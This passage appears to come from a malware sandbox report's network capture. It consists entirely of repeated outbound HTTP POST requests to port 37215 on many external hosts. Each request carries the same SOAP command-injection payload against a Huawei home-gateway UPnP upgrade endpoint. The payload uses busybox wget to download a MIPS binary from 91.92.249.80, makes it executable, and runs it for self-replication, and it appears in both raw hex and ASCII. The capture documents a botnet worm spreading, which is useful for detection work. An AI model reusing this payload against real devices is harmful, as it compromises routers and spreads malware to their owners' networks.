                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2431192.168.2.2351360208.85.251.17137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.695866108 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2432192.168.2.2338604157.26.235.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.696902037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2433192.168.2.234037241.189.113.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.696958065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2434192.168.2.233916890.239.209.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.697000027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2435192.168.2.2359274157.58.171.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.697016001 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2436192.168.2.234058641.206.127.537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.697067022 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2437192.168.2.2359322197.71.190.19737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.698193073 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2438192.168.2.2337608197.15.168.23837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.698195934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2439192.168.2.2359144102.144.97.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.698257923 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2440192.168.2.2353482157.98.183.4637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.698304892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2441192.168.2.2336576101.246.213.16037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.698452950 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
